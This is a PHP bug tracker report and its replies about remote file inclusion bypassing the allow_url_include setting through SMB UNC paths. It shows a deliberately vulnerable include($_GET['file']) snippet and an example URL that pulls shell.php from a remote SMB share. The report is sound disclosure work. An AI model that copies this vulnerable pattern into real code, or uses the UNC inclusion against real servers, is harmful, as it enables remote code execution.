|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2019-05-12 11:27 UTC] manish1046 at gmail dot com
Description: ------------ I was performing Remote File Inclusion attack against an following vulnerable code <?php include($_GET['file']); ?> In PHP.ini file, I changed the settings just for 'allow_url_fopen' and set it to "Off". 'allow_url_include' is also set to "Off". When I tried to include PHP code file hosted remotely (over HTTP), vulnerable code did not include the PHP code from remote URL. But PHP has behaviour and it make request to SMB share even if it is hosted remotely. Now, when I configured SMB share with anonymous read access enabled on it and hosted PHP code on that share, when asked PHP vulnerable code to including the PHP code hosted over SMB, it worked. For example, http://192.168.56.103/vuln.php?file=\\remote_ip\share_name\shell.php When performing this test, 'allow_url_fopen' and 'allow_url_include', both are set to "Off". PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Apr 25 01:01:30 2024 UTC |
So basically vuln.php is doing: <?php include('\\remote_ip\share_name\shell.php'); Since UNC paths are not URLs, they are not subject to allow_url_*. Am I missing something?Hello, Yes, you are right. So in this case PHP is not going to block the Remote URL inclusion? Is this the expected behaviour? And one more thing, what if code is including URL from webdav URLs. For example: <?php include('//remote_ip/file.php'); ?> Again, in this case also PHP is not going to prevent it? Thank You Manish